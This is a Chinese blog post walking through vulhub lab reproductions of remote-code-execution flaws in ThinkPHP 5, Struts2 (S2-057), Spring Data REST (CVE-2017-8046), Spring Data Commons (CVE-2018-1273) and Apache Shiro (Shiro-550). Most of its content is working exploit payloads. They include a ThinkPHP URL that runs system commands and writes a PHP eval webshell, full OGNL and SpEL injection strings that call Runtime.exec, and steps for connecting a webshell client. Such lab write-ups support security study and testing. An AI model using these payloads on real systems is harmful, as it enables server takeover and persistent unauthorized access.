首页 > 其他分享 >框架漏洞(5-rce s2-057 CVE-2017-8046 CVE-2018-1273 Shiro-550)

框架漏洞(5-rce s2-057 CVE-2017-8046 CVE-2018-1273 Shiro-550)

时间:2024-09-23 15:21:45浏览次数:12  
标签:8046 s2 29% 28% 29 .% 步骤 docker CVE

5-rce

步骤一:环境部署

cd vulhub/thinkphp/5-rce

docker-compose up -d

步骤二:输入系统命令: whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

步骤三:写入webshell到1.php

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

进行访问

步骤四:进行蚁剑连接

s2-057

步骤一:环境部署

cd vulhub/struts2/s2-057

docker-compose up -d

靶机地址:/struts2-showcase

步骤二:在url处输入 http://172.16.1.38:8080/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了

步骤三:利用BurpSuite抓包并改包,可以看到,123+123的结果已经在Location头中返回,说明存在漏洞。

原始poc

${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后的poc

/struts2-showcase/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

CVE-2017-8046

步骤一:部署环境

cd vulhub/spring/CVE-2017-8046

docker-compose up -d

步骤二:访问/customers/1 然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1
Host: 172.16.1.56:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

步骤三:成功发送数据包之后,可以进入docker容器内查看是否执行命令

docker ps

docker exec -it [CONTAINER ID] /bin/bash

CVE-2018-1273

步骤一:部署环境

cd vulhub/spring/CVE-2018-1273

docker-compose up -d

访问环境:/users

步骤二:提交任意信息,抓包

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

docker ps

docker exec -it a34a202bc94d /bin/bash

得出zcc

Shiro-550

步骤一:部署环境

cd vulhub/shiro/CVE-2016-4437

docker-compose up -d

步骤二:验证Shiro框架
使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123:,看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架:

步骤三:利用工具

注入webshell

进行连接

标签:8046,s2,29%,28%,29,.%,步骤,docker,CVE
From: https://blog.csdn.net/2301_82061181/article/details/142450480

相关文章

  • execve
    目录glibcdemoglibcexecve()执行由pathname指定的程序。这会导致当前正在被调用进程运行的程序被一个新程序替换,且该新程序会重新初始化栈、堆,以及(已初始化和未初始化的)数据段。demoexecve(path,args,env):用execve()替换当前进程为ls命令。如果execve()执行成功,当......
  • Tomcat CVE-2017-12615 靶场攻略
    漏洞描述当Tomcat运⾏在Windows操作系统时,且启⽤了HTTPPUT请求⽅法(例如,将readonly初始化参数由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代的JSP⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务......
  • Jboss CVE-2017-12149 靶场攻略
    漏洞简述该漏洞为Java反序列化错误类型,存在于Jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞漏洞范围JBoss5.x/6.x环境搭建cdvulhub-master/jboss/CVE-20......
  • 【游记】CSP-S2024游记
    CSP-S2024游记展开目录目录CSP-S2024游记初赛9.21上午9.21下午初赛9.21上午关于为什么从比赛当天开始,原因是我记性太差全忘了。早上起来水了会谷,吃完饭出发。同车@Vsinger_洛天依和@JustinXaviel.我和洛天依都不考钩组,所以把JustinXaviel送到地方之后我就拐着......
  • 介绍Gazebo,ROS2兼容的模拟仿真机器人-AirSim
    介绍Gazebo,给出你的说明。Gazebo简介Gazebo是一个著名的开源机器人仿真软件,广泛用于机器人算法开发、物理交互模拟、传感器数据的模拟以及视觉仿真等。它提供了一个丰富的环境,其中包括高度详细的模型、逼真的物理引擎和高级的图形渲染。Gazebo能够模拟复杂的环境以及多......
  • After Effects2024中文版下载:附安装包+详细安装步骤
    如大家所熟悉的,AfterEffects常常被简称为AE,它是一款专业图形视频处理软件,适用于从事设计和视频特效的机构和个人。在视频创作中熟练使用它,可以帮助您高效且精确地创建无数种引人注目的动态图形和震撼人心的视觉效果。相信用过Premiere(PR)这款视频剪辑工具的小伙伴,对AE更加不......
  • CSP-S2024初赛心得
    预估分数:73.5写题心得:13min:前15道题直接写完了,这是CSP-S的难度?25min:阅读程序第一题写完,还算简单,主程序看着应该是排序,直接模拟就能写完。45min:这tm是什么题???第二题只看懂是状压dp,实现什么根本不知道。第三题看出来了质数筛,其他的一点没懂,赛后才知道tmd要手模哈希表,20min写了个......
  • CSP-S2024 游记(初赛+复赛)
    初赛Day-2这个时候我似乎不能碰电脑,自己手摸了一下算法和数据结构。Day-1找了一个CSDN的初赛复习资料,教练说我应该考六七十问题不大,给我吓坏了。然后一个晚上都在复习,本来不去上晚自习的,但是听别的班化学老师说那天有化竞课,所以我就去上了晚自习。回家复习到十二点,还写......
  • vCenter最新漏洞CVE-2024-38812, CVE-2024-38813修复
    第1章前言 我们从Broadcom获悉,2024年9月17日,Broadcom公布了VMwarevCneterServer、和VMwareCloudFoundation产品存在多个安全性漏洞(CVE-2024-38812,CVE-2024-38813)本次漏洞CVSS分数为9.8,漏洞评级为高危,建议大家尽快升级。当前受影响版本为:VMwarevCenterServer8.......
  • Shiro-认证绕过漏洞(CVE-2020-1957)
    目录漏洞原理源码分析与复现影响版本漏洞原理核心点就是shiro和spring对uri进行配合匹配的时候有缺陷导致的,shiro中很轻易就能绕过,其次spring中对;分号好像情有独钟,被大牛们发现后也就一下子绕过了。主流payload:/xxx/..;/admin/具体后台路由不一定是admin,得看情况而定,但是下面......